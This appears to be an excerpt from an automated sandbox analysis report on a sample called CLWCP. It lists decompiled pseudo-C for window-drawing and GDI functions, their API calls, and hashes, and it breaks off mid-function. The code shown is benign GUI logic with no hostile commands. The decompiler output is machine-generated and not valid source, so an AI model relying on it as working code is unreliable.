                                    • Part of subcall function 00423228: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232C1
                                    • Part of subcall function 00423228: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232CC
                                  • 72E7B410.GDI32(?,?,000000FF), ref: 00422B0B
                                  • 72E7B150.GDI32(?,?,?,000000FF), ref: 00422B1A
                                  • 72E7AD70.GDI32(?,0000000C), ref: 00422B2C
                                  • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00422B3B
                                  • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00422B6E
                                  • SetStretchBltMode.GDI32(?,00000004), ref: 00422B7C
                                  • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00422B94
                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 00422BB1
                                  • 72E7A590.GDI32(00000000,00000000,00422C9B,?,?,0000000E,00000000,?,0000000C), ref: 00422C12
                                  • SelectObject.GDI32(?,?), ref: 00422C27
                                  • SelectObject.GDI32(?,00000000), ref: 00422C86
                                  • DeleteDC.GDI32(00000000), ref: 00422C95
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                  • String ID:
                                  • API String ID: 2051775979-0
                                  • Opcode ID: 68240e5f66cd39e59641131e3f8c2fb30c7438ea1fdd6b434881b86328a201e0
                                  • Instruction ID: 1018d1ef3d05885111cd4e3f119a6ce98d3d1eab0ce21db22eb6a5c8b17d6e0f
                                  • Opcode Fuzzy Hash: 68240e5f66cd39e59641131e3f8c2fb30c7438ea1fdd6b434881b86328a201e0
                                  • Instruction Fuzzy Hash: 9E713A75B00215BFCB50DFA9D985F5ABBF8AF08300F51856AB509E7282D678ED10CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041ECE4, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E0041ECE4(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00406374();
				_v28 = __eax;
				_push(0);
				L00406374();
				_v32 = __eax;
				_push(_t87);
				_push(0x41ee32);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L004066E4();
					_v24 = _t37;
					if(_v24 == 0) {
						E0041EC2C(__ecx);
					}
					_push(_t87);
					_push(0x41eda1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L0040636C();
					_v20 = _t41;
					if(_v20 == 0) {
						E0041EC2C(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x41eda8);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00406944();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L0040635C();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(0x41ee39);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                  0x0041ece5
                                  0x0041ece7
                                  0x0041ecf2
                                  0x0041ecf3
                                  0x0041ecf4
                                  0x0041ecf6
                                  0x0041ecf9
                                  0x0041ecfb
                                  0x0041ed00
                                  0x0041ed03
                                  0x0041ed05
                                  0x0041ed0a
                                  0x0041ed0f
                                  0x0041ed10
                                  0x0041ed15
                                  0x0041ed18
                                  0x0041ed25
                                  0x0041ed2c
                                  0x0041ed46
                                  0x0041ed48
                                  0x0041ed4d
                                  0x0041ed54
                                  0x0041ed56
                                  0x0041ed56
                                  0x0041ed5d
                                  0x0041ed5e
                                  0x0041ed63
                                  0x0041ed66
                                  0x0041ed6c
                                  0x0041ed70
                                  0x0041ed71
                                  0x0041ed74
                                  0x0041ed75
                                  0x0041ed7a
                                  0x0041ed81
                                  0x0041ed83
                                  0x0041ed83
                                  0x0041ed8a
                                  0x0041ed8d
                                  0x0041ed90
                                  0x0041ed95
                                  0x0041ed98
                                  0x0041ed99
                                  0x0041ed9b
                                  0x0041eda0
                                  0x0041ed2e
                                  0x0041ed2e
                                  0x0041ed30
                                  0x0041ed32
                                  0x0041ed37
                                  0x0041ed38
                                  0x0041ed3b
                                  0x0041ed3c
                                  0x0041ed41
                                  0x0041edac
                                  0x0041edbb
                                  0x0041edca
                                  0x0041edf1
                                  0x0041edf8
                                  0x0041edff
                                  0x0041edff
                                  0x0041ee06
                                  0x0041ee0d
                                  0x0041ee0d
                                  0x0041ee06
                                  0x0041ee14
                                  0x0041ee17
                                  0x0041ee1a
                                  0x0041ee23
                                  0x0041ee31
                                  0x0041ee31

                                  APIs
                                  • 72E7A590.GDI32(00000000), ref: 0041ECFB
                                  • 72E7A590.GDI32(00000000,00000000), ref: 0041ED05
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041ED25
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,0041EE32,?,00000000,00000000), ref: 0041ED3C
                                  • 72E7AC50.USER32(00000000,?,00000018,?,00000000,0041EE32,?,00000000,00000000), ref: 0041ED48
                                  • 72E7A520.GDI32(00000000,?,?,00000000,0041EDA1,?,00000000,?,00000018,?,00000000,0041EE32,?,00000000,00000000), ref: 0041ED75
                                  • 72E7B380.USER32(00000000,00000000,0041EDA8,00000000,0041EDA1,?,00000000,?,00000018,?,00000000,0041EE32,?,00000000,00000000), ref: 0041ED9B
                                  • SelectObject.GDI32(?,?), ref: 0041EDB6
                                  • SelectObject.GDI32(?,00000000), ref: 0041EDC5
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041EDF1
                                  • SelectObject.GDI32(?,00000000), ref: 0041EDFF
                                  • SelectObject.GDI32(?,00000000), ref: 0041EE0D
                                  • DeleteDC.GDI32(?), ref: 0041EE23
                                  • DeleteDC.GDI32(?), ref: 0041EE2C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                  • String ID:
                                  • API String ID: 956127455-0
                                  • Opcode ID: b70c58a1b7a1e92f63c0cf40117c06db130ebad8a985d91a85943b9317bd30f3
                                  • Instruction ID: c19eca584f9691c187b98bd90bd9418c9b4b0e0babf77e61b71081cbceb9e1ba
                                  • Opcode Fuzzy Hash: b70c58a1b7a1e92f63c0cf40117c06db130ebad8a985d91a85943b9317bd30f3
                                  • Instruction Fuzzy Hash: B1410A75E00219AFDB10DBE9DC42FAFB7FCEB49704F110466BA05F7281C67999508BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043C874, Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E0043C874(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t116;
				void* _t170;
				signed int _t173;
				intOrPtr* _t179;
				intOrPtr* _t182;
				intOrPtr _t189;
				signed int _t192;
				intOrPtr _t214;
				signed int _t215;
				void* _t230;
				void* _t233;
				void* _t235;
				intOrPtr _t236;

				_t233 = _t235;
				_t236 = _t235 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x16d) != 0 ||  *(_v8 + 0x174) > 0) {
					_t116 = E0043BA58(_v8);
					_push(_t116);
					L004067EC();
					_v16 = _t116;
					_push(_t233);
					_push(0x43cad1);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t236;
					GetClientRect(E0043BA58(_v8),  &_v32);
					GetWindowRect(E0043BA58(_v8),  &_v48);
					MapWindowPoints(0, E0043BA58(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x174),  *(_v8 + 0x174));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t192 = GetWindowLongA(E0043BA58(_v8), 0xfffffff0);
					if((_t192 & 0x00200000) != 0) {
						_t182 =  *0x46fb00; // 0x470904
						_v48.right = _v48.right +  *((intOrPtr*)( *_t182))(0x14);
					}
					if((_t192 & 0x00100000) != 0) {
						_t179 =  *0x46fb00; // 0x470904
						_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t179))(0x15);
					}
					if( *(_v8 + 0x16d) != 0) {
						_t230 = 0;
						_t215 =  *(_v8 + 0x16b) & 0x000000ff;
						if(_t215 != 0) {
							_t230 = 0 +  *((intOrPtr*)(_v8 + 0x170));
						}
						_t173 =  *(_v8 + 0x16c) & 0x000000ff;
						if(_t173 != 0) {
							_t230 = _t230 +  *((intOrPtr*)(_v8 + 0x170));
						}
						if(( *(_v8 + 0x16a) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t230;
						}
						if(( *(_v8 + 0x16a) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t230;
						}
						if(( *(_v8 + 0x16a) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t230;
						}
						if(( *(_v8 + 0x16a) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t230;
						}
						DrawEdge(_v16,  &_v48,  *(0x46edbc + (_t215 & 0x0000007f) * 4) |  *(0x46edcc + (_t173 & 0x0000007f) * 4),  *(_v8 + 0x16a) & 0x000000ff |  *(0x46eddc + ( *(_v8 + 0x16d) & 0x000000ff) * 4) |  *(0x46edec + ( *(_v8 + 0x1ad) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041DEAC( *((intOrPtr*)(_v8 + 0x178))));
					_pop(_t214);
					 *[fs:eax] = _t214;
					_push(0x43cad8);
					_push(_v16);
					_t170 = E0043BA58(_v8);
					_push(_t170);
					L00406944();
					return _t170;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t189 = E00427D34(E00427C2C());
					if(_t189 != 0) {
						_t189 = _v8;
						if(( *(_t189 + 0x52) & 0x00000002) != 0) {
							_t189 = E00428300(E00427C2C(), 0, _v8);
						}
					}
					return _t189;
				}
			}






















                                  0x0043c875
                                  0x0043c877
                                  0x0043c87d
                                  0x0043c880
                                  0x0043c88d
                                  0x0043c8a2
                                  0x0043c8a7
                                  0x0043c8a8
                                  0x0043c8ad
                                  0x0043c8b2
                                  0x0043c8b3
                                  0x0043c8b8
                                  0x0043c8bb
                                  0x0043c8cb
                                  0x0043c8dd
                                  0x0043c8f3
                                  0x0043c908
                                  0x0043c921
                                  0x0043c92c
                                  0x0043c92d
                                  0x0043c92e
                                  0x0043c92f
                                  0x0043c93f
                                  0x0043c94a
                                  0x0043c94b
                                  0x0043c94c
                                  0x0043c94d
                                  0x0043c95e
                                  0x0043c966
                                  0x0043c96a
                                  0x0043c973
                                  0x0043c973
                                  0x0043c97c
                                  0x0043c980
                                  0x0043c989
                                  0x0043c989
                                  0x0043c996
                                  0x0043c99c
                                  0x0043c9a1
                                  0x0043c9aa
                                  0x0043c9af
                                  0x0043c9af
                                  0x0043c9b8
                                  0x0043c9c1
                                  0x0043c9c6
                                  0x0043c9c6
                                  0x0043c9d6
                                  0x0043c9d8
                                  0x0043c9d8
                                  0x0043c9e5
                                  0x0043c9e7
                                  0x0043c9e7
                                  0x0043c9f4
                                  0x0043c9f6
                                  0x0043c9f6
                                  0x0043ca03
                                  0x0043ca05
                                  0x0043ca05
                                  0x0043ca58
                                  0x0043ca58
                                  0x0043ca71
                                  0x0043ca7c
                                  0x0043ca7d
                                  0x0043ca7e
                                  0x0043ca7f
                                  0x0043ca90
                                  0x0043caac
                                  0x0043cab3
                                  0x0043cab6
                                  0x0043cab9
                                  0x0043cac1
                                  0x0043cac5
                                  0x0043caca
                                  0x0043cacb
                                  0x0043cad0
                                  0x0043cad8
                                  0x0043cae0
                                  0x0043cae8
                                  0x0043caef
                                  0x0043caf1
                                  0x0043caf8
                                  0x0043cb04
                                  0x0043cb04
                                  0x0043caf8
                                  0x0043cb0f
                                  0x0043cb0f

                                  APIs
                                  • 72E7B080.USER32(00000000), ref: 0043C8A8
                                  • GetClientRect.USER32 ref: 0043C8CB
                                  • GetWindowRect.USER32 ref: 0043C8DD
                                  • MapWindowPoints.USER32 ref: 0043C8F3
                                  • OffsetRect.USER32(?,?,?), ref: 0043C908
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043C921
                                  • InflateRect.USER32(?,00000000,00000000), ref: 0043C93F
                                  • GetWindowLongA.USER32 ref: 0043C959
                                  • DrawEdge.USER32(?,?,?,00000008), ref: 0043CA58
                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043CA71
                                  • OffsetRect.USER32(?,?,?), ref: 0043CA90
                                  • FillRect.USER32 ref: 0043CAAC
                                  • 72E7B380.USER32(00000000,?,0043CAD8,?,?,?,?,?,?,?,?,00000000,000000F0,?,00000000,00000000), ref: 0043CACB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                  • String ID:
                                  • API String ID: 156109915-0
                                  • Opcode ID: 255f1251702d0cfd4db5fbefcfb9a5a4243f6538ed010eff58d35a35f526c58a
                                  • Instruction ID: 6a11cf93cadaabe11ecd7179de64b2f71a6741c0a28c7ab0443192d99c98652f
                                  • Opcode Fuzzy Hash: 255f1251702d0cfd4db5fbefcfb9a5a4243f6538ed010eff58d35a35f526c58a
                                  • Instruction Fuzzy Hash: FD81EE71E00148AFCB01DBA9D885BEEB7F9AF09304F1540AAF515F7291C779AE05CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406B74, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406B74(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                  0x00406b7b
                                  0x00406b7d
                                  0x00406b7f
                                  0x00406b91
                                  0x00406ba0
                                  0x00406bac
                                  0x00406bb8
                                  0x00406bbd
                                  0x00406bdc
                                  0x00406bc3
                                  0x00406bd3
                                  0x00406bd3
                                  0x00406be1
                                  0x00406bfe
                                  0x00406be7
                                  0x00406bf7
                                  0x00406bf7
                                  0x00406c0b

                                  APIs
                                  • FindWindowA.USER32 ref: 00406B8C
                                  • RegisterClipboardFormatA.USER32 ref: 00406B98
                                  • RegisterClipboardFormatA.USER32 ref: 00406BA7
                                  • RegisterClipboardFormatA.USER32 ref: 00406BB3
                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00406BCB
                                  • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00406BEF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                  • API String ID: 1416857345-3736581797
                                  • Opcode ID: c1f6ee2bc01227a891c593df0bbf437d68cb65550a939cfbfb4b1d14e9f195bc
                                  • Instruction ID: c64f4e0d01e9818054fa7177533f64faec2168a63f556f3dd3b514976f2ba15f
                                  • Opcode Fuzzy Hash: c1f6ee2bc01227a891c593df0bbf437d68cb65550a939cfbfb4b1d14e9f195bc
                                  • Instruction Fuzzy Hash: FF1124B0204315AFE7149F65CC41B66B7E8EF44710F22443AB986AF2D1D6799C61CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00428300, Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E00428300(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t78;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E0043BA58(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E0043BA58(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E0043BA58(_v8);
					_push(_t55);
					L004067EC();
					_v12 = _t55;
					_push(_t120);
					_push(0x42845b);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E0043BA58(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							_t78 = GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E004128F0(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00427E9C( &_v56, 2);
					E00427DF0(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x428462);
					_push(_v12);
					_t74 = E0043BA58(_v8);
					_push(_t74);
					L00406944();
					return _t74;
				}
			}






















                                  0x00428301
                                  0x00428303
                                  0x00428309
                                  0x0042830b
                                  0x0042830e
                                  0x0042831b
                                  0x00428323
                                  0x00428468
                                  0x00428329
                                  0x00428336
                                  0x0042834b
                                  0x00428353
                                  0x00428358
                                  0x00428359
                                  0x0042835e
                                  0x00428363
                                  0x00428364
                                  0x00428369
                                  0x0042836c
                                  0x00428376
                                  0x00428377
                                  0x00428378
                                  0x00428379
                                  0x0042837a
                                  0x0042837d
                                  0x0042838a
                                  0x00428394
                                  0x0042839f
                                  0x004283a8
                                  0x004283b7
                                  0x004283d1
                                  0x004283dd
                                  0x004283de
                                  0x004283df
                                  0x004283e0
                                  0x004283e1
                                  0x004283f2
                                  0x004283f2
                                  0x00428394
                                  0x00428417
                                  0x00428423
                                  0x00428436
                                  0x0042843d
                                  0x00428440
                                  0x00428443
                                  0x0042844b
                                  0x0042844f
                                  0x00428454
                                  0x00428455
                                  0x0042845a
                                  0x0042845a

                                  APIs
                                  • GetWindowLongA.USER32 ref: 0042831B
                                  • GetWindowRect.USER32 ref: 00428336
                                  • OffsetRect.USER32(?,?,?), ref: 0042834B
                                  • 72E7B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428359
                                  • GetWindowLongA.USER32 ref: 0042838A
                                  • GetSystemMetrics.USER32 ref: 0042839F
                                  • GetSystemMetrics.USER32 ref: 004283A8
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 004283B7
                                  • GetSysColorBrush.USER32(0000000F), ref: 004283E4
                                  • FillRect.USER32 ref: 004283F2
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0042845B,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428417
                                  • 72E7B380.USER32(00000000,?,00428462,?,?,00000000,0042845B,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428455
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                  • String ID:
                                  • API String ID: 3936689491-0
                                  • Opcode ID: 2a7ee2e60d30e2d577557d2e56a907ea10492473a2cf377e106177e643b46db6
                                  • Instruction ID: 57993a5745ce5bd1c60f1d7df9515370e2aa4100a70a180ee87e358f7484cc49
                                  • Opcode Fuzzy Hash: 2a7ee2e60d30e2d577557d2e56a907ea10492473a2cf377e106177e643b46db6
                                  • Instruction Fuzzy Hash: 8E417271A00119AFCB00EBA9DD46EEFB7BDEF49314F10412AF905F3281CA799E058768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00425804, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00425804(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x470933 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x470920 = E0042525C(7, _t60,  *0x470920, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                  0x0042580d
                                  0x00425810
                                  0x0042581a
                                  0x0042584a
                                  0x00425850
                                  0x0042590c
                                  0x00425914
                                  0x00425914
                                  0x00425858
                                  0x0042585d
                                  0x00425868
                                  0x00425873
                                  0x00425878
                                  0x004258e1
                                  0x004258f9
                                  0x0042590a
                                  0x004258f5
                                  0x004258f5
                                  0x004258f5
                                  0x00000000
                                  0x004258e1
                                  0x00425884
                                  0x00425893
                                  0x00000000
                                  0x00000000
                                  0x004258a5
                                  0x004258bd
                                  0x004258d3
                                  0x00000000
                                  0x00000000
                                  0x004258d9
                                  0x004258db
                                  0x004258db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004258bd
                                  0x0042582e
                                  0x00425843
                                  0x00000000

                                  APIs
                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042583D
                                  • GetSystemMetrics.USER32 ref: 00425862
                                  • GetSystemMetrics.USER32 ref: 0042586D
                                  • GetClipBox.GDI32(?,?), ref: 0042587F
                                  • GetDCOrgEx.GDI32(?,?), ref: 0042588C
                                  • OffsetRect.USER32(?,?,?), ref: 004258A5
                                  • IntersectRect.USER32 ref: 004258B6
                                  • IntersectRect.USER32 ref: 004258CC
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                  • String ID: EnumDisplayMonitors
                                  • API String ID: 362875416-2491903729
                                  • Opcode ID: b27db3c225871d1c03643b53e4a1f5b927304ab3e4ff9a8e849e83dd598a7467
                                  • Instruction ID: e2727030d81ebfaae0b5d2044e3438c5613764c08ae458e84395ae5835d28448
                                  • Opcode Fuzzy Hash: b27db3c225871d1c03643b53e4a1f5b927304ab3e4ff9a8e849e83dd598a7467
                                  • Instruction Fuzzy Hash: B4316DB2A0161DABDB00DBA5D844AEFB7FCAB48310F404127E915E2242E77899558BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00439A78, Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00439A78(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
